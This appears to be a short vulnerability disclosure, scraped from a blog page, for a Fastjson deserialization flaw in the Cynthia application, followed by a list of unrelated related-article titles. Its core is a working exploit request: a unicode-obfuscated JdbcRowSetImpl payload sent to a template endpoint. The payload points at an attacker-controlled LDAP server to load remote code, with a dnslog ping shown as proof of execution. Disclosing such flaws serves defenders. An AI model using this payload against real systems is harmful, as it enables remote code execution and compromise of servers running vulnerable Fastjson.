Cynthia - Fastjson deserialization vulnerability
This is a Fastjson deserialization vulnerability
1.login fast
Login required
2.Fastjson deserialization
Trigger point
http://xx.xxx.xxx.xx/cynthia/template/saveTemplateMailConfig.do?templateId=744313&templateMailOptions={“b”:{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":“ldap://xx.xx.xx.xx:1389/wj0bb4”,“autoCommit”:true}}
Deploy malicious LDAP on the server ,then Request received
ping -c2 aa.lmy0c7.dnslog.cn The command is executed
Cynthia - Fastjson deserialization vulnerability相关推荐
- 深度对比Jackson和Fastjson,最终我还是选择了...
点击关注公众号,Java干货及时送达 来源:cnblogs.com/larva-zhh/p/11544317.html 为什么要替换fastjson 框架选型 替换fastjson Deseriali ...
- weblogic修改banner_WeblogicScanV1.3
WeblogicScan Weblogic一键漏洞检测工具,V1.3 软件作者:Tide_RabbitMask 免责声明:Pia!(o ‵-′)ノ"(ノ﹏ 本工具仅用于安全测试,请勿用于非法 ...
- Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)
第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1.攻击Linux服务器 2.SQL注入攻击 3.shell类型 4.攻击Windows服务器 5.利用公用服务 6.MS17-010 永恒之蓝 ...
- Java RMI反序列化/JEP290相关
RMI 远程过程调用 (Remote Procedure Call)是一种服务器-客户端模式, Java的RMI(Remote Method Invocation)是一种RPC实现. 其基本思想是程序 ...
- 红日安全内网渗透笔记
靶场下载地址:漏洞详情 环境配置参考:[红日安全-VulnStack]ATT&CK实战系列--红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 .核心区的AD ...
- php cve 2017 12933,18-017 (March 27, 2018)
描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...
- 10 个 Java 安全最佳实践
Java 安全问题 尽管我们都致力于编写出色的代码,但 Java 安全性并不总是开发人员思维的一部分.但是,防止 Java 安全问题应该与使您的 Java 应用程序具有高性能.可扩展性和可维护性一样重 ...
- Cynthia - XSS vulnerability exists in the newly created TAG
There is an XSS vulnerability when creating a new TAG 1. Click the settings icon and then click the ...
- FastJson屡爆漏洞,或许你应该试试它?
点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 前言 这个周末被几个技术博主的同一篇公众号文章「预警」尽快升级FastJson版本,避免恶意 ...
最新文章
- 在Linux上限制远程登陆的IP
- 利用逻辑回归进行简单的人群分类解决广告推荐问题
- vsftp中配置默认目录
- 丢掉DDoS的八个幻想
- c语言判断字符是否等于e,C语言如何实现删除字符串中的字符
- eclipse中如何将中文乱码的class文件改为可读
- log4j平稳升级到log4j2
- 类型不匹配 java_java – 与泛型类型不匹配
- 网页嵌入暴风影音播放插件
- 树莓派制作语音对话机器人
- Android 如何反编译apk查看源码
- xshell无法显示汉字
- 华为云数据容灾服务,如何守护企业数据安全
- 云队友丨任正非内部演讲:星光不问赶路人
- Xlookup、Vlookup请走开,万能的Wlookup函数来了!
- 布尔(BOOL)代数及其运算
- 【js组件】仿照steam样式制造自定义横向纵向滚动条
- 【SpringBoot】:j2cache入门案例
- 解决客户 IE 浏览器“兼容性视图“设置带来的问题
- StringBuffer是安全的吗?
热门文章
- .NET开源开发项目
- Java学习-使用文本编辑器编辑Java源代码
- 【科创人】联软科技张建耀:不擅长营销的拓荒高手,企业长期发展必经管理变革
- 今日免费PNG图标集下载 - SweetiePlus
- 13、撤回(撤销)、驳回(退回)、作废(终止)、挂起(中止)
- 2021-2027全球与中国双面身份证打印机市场现状及未来发展趋势
- 解析程序化中的机器人的算法写作
- nuxt服务端渲染技术
- arbiter circuit(以Verilog FSM实现仲裁器)
- java excel 注解_Java中注解学习系列教程-5 excel导出优化初级阶段